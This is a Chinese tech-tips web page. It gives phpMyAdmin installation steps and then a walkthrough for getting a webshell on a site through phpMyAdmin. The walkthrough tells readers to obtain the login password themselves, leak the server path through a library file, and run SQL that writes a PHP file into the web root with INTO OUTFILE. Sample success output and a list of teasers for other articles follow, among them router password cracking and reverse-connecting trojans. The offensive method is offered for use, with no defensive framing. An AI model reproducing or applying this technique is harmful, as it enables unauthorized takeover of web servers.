phpmyadmin 配置 phpmyadmin怎么得到webshell?
phpmyadmin 配置安装:
1.网上下载PHPMyAdmin,我们将其释放到htdocs目录中,例如htdocs\phpmyadmin。
2.打开phpmyadmin目录,在此目录下是否有config.sample.inc.php文件,如果存在,那么将其改名为config.inc.php。(根据版本不同,有可能直接就有config.inc.php文件,那就无需改名,也有可能根本就没有config.sample.inc.php或者config.inc.php,那我们就到phpmyadmin\libraries目录下将config.default.php复制到phpmyadmin目录下并改名为config.inc.php)。
3.打开config.inc.php文件(可以用写字板),找到$cfg['blowfish_secret']='';与$cfg['Servers'][$i]['auth_type']='cookie';,如果$cfg['Servers'][$i]['auth_type']的值就像前面看到的那样为cookie的话,那么我们必须在$cfg['blowfish_secret']=''的引号中任意写入一串字符,大家可以把它理解为一个身份验证码。比如$cfg['blowfish_secret']='sunec'。存盘退出。
至此,phpmyadmin的安装配置工作就结束了,进入浏览器,在地址栏输入http://localhost/phpmyadmin/main.php,(这里的路径是根据先前你将phpmyadmin解压在htdocs的目录名决定的),顺利的话,页面上应该出现让你输入用户名密码的画面了,输入用户名密码(Mysql的用户名密码),随即进入phpmyadmin的主界面。至于使用方法~暂时不在这里展开,大家可以自己先摸索一下~
phpmyadmin怎么得到webshell?
1.如何拿到登陆密码,自己想办法。
2.访问 : http://url/phpmyadmin/libraries/select_lang.lib.php 得到物理路径.
3.选择一个Database.运行以下语句.
----start code---
Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES('');
select cmd from a into outfile 'F:/Program Files/Apache Group/Apache2/htdocs/phpMyAdmin/d.php/d.php';
Drop TABLE IF EXISTS a;
----end code---
4.如果没什么意外.对应网站得到webshell
您运行的 SQL 语句已经成功运行了。
SQL 查询:
CREATE TABLE a(
cmd text NOT NULL
);# MySQL 返回的查询结果为空(即零行)。
INSERT INTO a( cmd )
VALUES (
''
);# 影响列数: 1
SELECT cmd
FROM a
INTO OUTFILE 'F:/Program Files/Apache Group/Apache2/htdocs/phpMyAdmin/d.php';# 影响列数: 1
DROP TABLE IF EXISTS a;# MySQL 返回的查询结果为空(即零行)。
什么是非对称加密?什么是对称加密?
今天刚好为站点的后台弄了下https,就来分享我了解的吧。密码学最早可以追溯到古希腊罗马时代,那时的加密方法很简单:替换字母。早期的密码学:古希腊人用一种叫 Scytale 的工具加密。更快的工具是 transposi
详情2018-01-15 17:27:37责编:llp 来源:驱动管家手机使用技巧 智能手机怎么用?
1。用智能手机工作室1 1版备份联系人、短信、通话记录等, 下载刷机相关文件(刷机工具, ROM, Radio, 格式化ExtROM工具Repart_DOC exe), 同步软件ActiveSync要用最新版4 0以上的。2。确认下载的ROM文件(n
详情2018-01-04 11:50:01责编:llp 来源:驱动管家web服务器的漏洞 web服务器的保护
Web安全分为两大类:· Web服务器的安全性(Web服务器本身安全和软件配置)。· Web应用程序的安全性(在Web服务器上运行的Java、 ActiveX、PHP、ASP代码的安全)。Web服务器面临的攻击Web服务器攻击利用Web服务器
详情2018-01-08 19:52:37责编:llp 来源:驱动管家电脑感染了恶意软件会出现哪些症状?
电脑就像人一样,也会出现生病的现象,在“生病”的时候也会出现一些症状,下面小编就为大家介绍电脑被恶意软件感染出现的一些症状吧。现在请你闭上眼睛,设想这样一个场景:你打开了你的电脑,然后不停地等啊等
详情2018-01-16 16:39:23责编:llp 来源:驱动管家petya勒索病毒的危害 petya勒索病毒怎么预防?
背景:在6月23号我们向您通报了有关“5 12WannaCry”勒索病毒新变种肆虐的消息之后(该次应急通报的具体内容请查看第7-10页),在昨天6月27日晚间时候(欧洲6月27日下午时分),新一轮的勒索病毒变种(本次名为Pe
详情2018-01-16 19:41:51责编:llp 来源:驱动管家怎么抵挡ddos攻击?对付ddos攻击的三大方法
一、拒绝服务攻击的发展:从拒绝服务攻击诞生到现在已经有了很多的发展,从最初的简单Dos到现在的DdoS。那么什么是Dos和DdoS呢?DoS是一种利用单台计算机的攻击 方式。而DdoS(Distributed Denial of Service,
详情2018-01-15 16:04:28责编:llp 来源:驱动管家如何进行qq密保设置?qq密保令牌不能使用怎么办?
腾讯公司在2009年5月7日上午9点推出全新的QQ安全中心,特别推出密保令牌服务。密保令牌是二代密保其中的一个密保手段,需要安装在手机上,可以显示6位动态密码。当您成功绑定密保令牌后,令牌将会出现在“统一安
详情2018-01-17 12:20:54责编:llp 来源:驱动管家怎么破解路由器密码,实现内网中反弹木马的上线?
本文总结几个破解路由器密码的方法以及如何实现内网中反弹木马的上线:一 扫描路由器端口为了路由器的安全,网管通常都会将路由器的默认端口(80)给更改掉,所以我们破解路由器密码的第一步就是必须要找到路由器的
详情2018-01-15 10:30:22责编:llp 来源:驱动管家mysql更改密码的几种方法 mysql密码清空方法
网上流传的几种破解mysql root密码的几种方法:方法一使用phpmyadmin,这是最简单的了,修改mysql库的user表,不过别忘了使用PASSWORD函数。方法二使用mysqladmin,这是前面声明的一个特例。mysqladmin -u root
详情2018-01-15 14:43:59责编:llp 来源:驱动管家手机炸弹是什么?手机炸弹程序是怎样的?
下载一个手机炸弹软件随便输入一个手机号码然后选择次数之类的利用WSockExpert_Cn exe监听手机炸弹得出http: sms 98960 com pages user-newlogin asp?number=13088170991原来手机炸弹只不过是一个URL循环提交的
详情2018-01-09 16:51:51责编:llp 来源:驱动管家
- upx脱壳的方法 破解upx程序的过程
- 手机QQ浏览器下载的文件保存路径是什么?QQ浏览器下载路径查看
- 怎样把会声会影的视频上传到YouTube上?会声会影使用教程教程推荐
- 还不知道如何看显卡散热器?关于显卡散热器的详解
- 鼠标左键单击变双击效果的情况该怎么解决?
- u盘文件被隐藏教你这样快速恢复好
- mac系统和windows系统是如何通过Wifi无线传输文件
- 红米note联通增强版不支持移动卡
- 手机wifi上网设置 教新手的你设置手机wifi上网
- 路由器设置好了为什么在只有手机能搜到信号而笔记本不行?
- 搜狗输入法为什么切换不流畅?搜狗输入法卡顿的解决办法
- javascript教程 javascript字符串如何被null字符截断
- css教程 css跨站挂马是怎么做的?
- 微信网页版登陆不了怎么解决?微信网页版登陆不了的原因
- 百度贴吧地理位置在哪儿关闭?百度贴吧关闭地理位置的设置
- 神舟笔记本无线网卡驱动在安装的时候要注意什么
- 通过cpu使用率来排除电脑问题你可能不知道这个
- 两台路由器怎么很好地设置无线桥接
- 打开电脑文件夹的时候提示拒绝访问可以这样解决
- 小米手机怎么用路由器上网?小米手机设置路由器的方法